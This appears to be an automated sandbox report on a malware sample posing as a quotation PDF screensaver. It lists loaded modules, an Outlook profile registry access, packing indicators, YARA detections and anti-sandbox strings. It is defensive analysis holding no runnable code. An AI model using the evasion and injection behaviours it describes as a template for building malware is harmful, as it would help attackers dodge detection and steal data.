Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static file information: File size 1484800 > 1048576

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16a000

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A8086000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925389461.00000210C0A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A8086000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925389461.00000210C0A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: QUOTATION_NOVQTRA071244PDF.scr.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c0a90000.9.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b801f8d0.4.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b801f8d0.4.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b801f8d0.4.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b801f8d0.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b801f8d0.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c07b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7db2c38.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d019b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1924921485.00000210C07B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_NOVQTRA071244PDF.scr.exe PID: 7628, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C106210D push ds; ret	0_2_00007FF7C1062111
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1285A67 push ebx; iretd	0_2_00007FF7C1285A69
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1298C66 push edx; iretd	0_2_00007FF7C1298C67
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1298C06 push ebx; iretd	0_2_00007FF7C1298C07

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: QUOTATION_NOVQTRA071244PDF.scr.exe PID: 7628, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A83BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLP]U
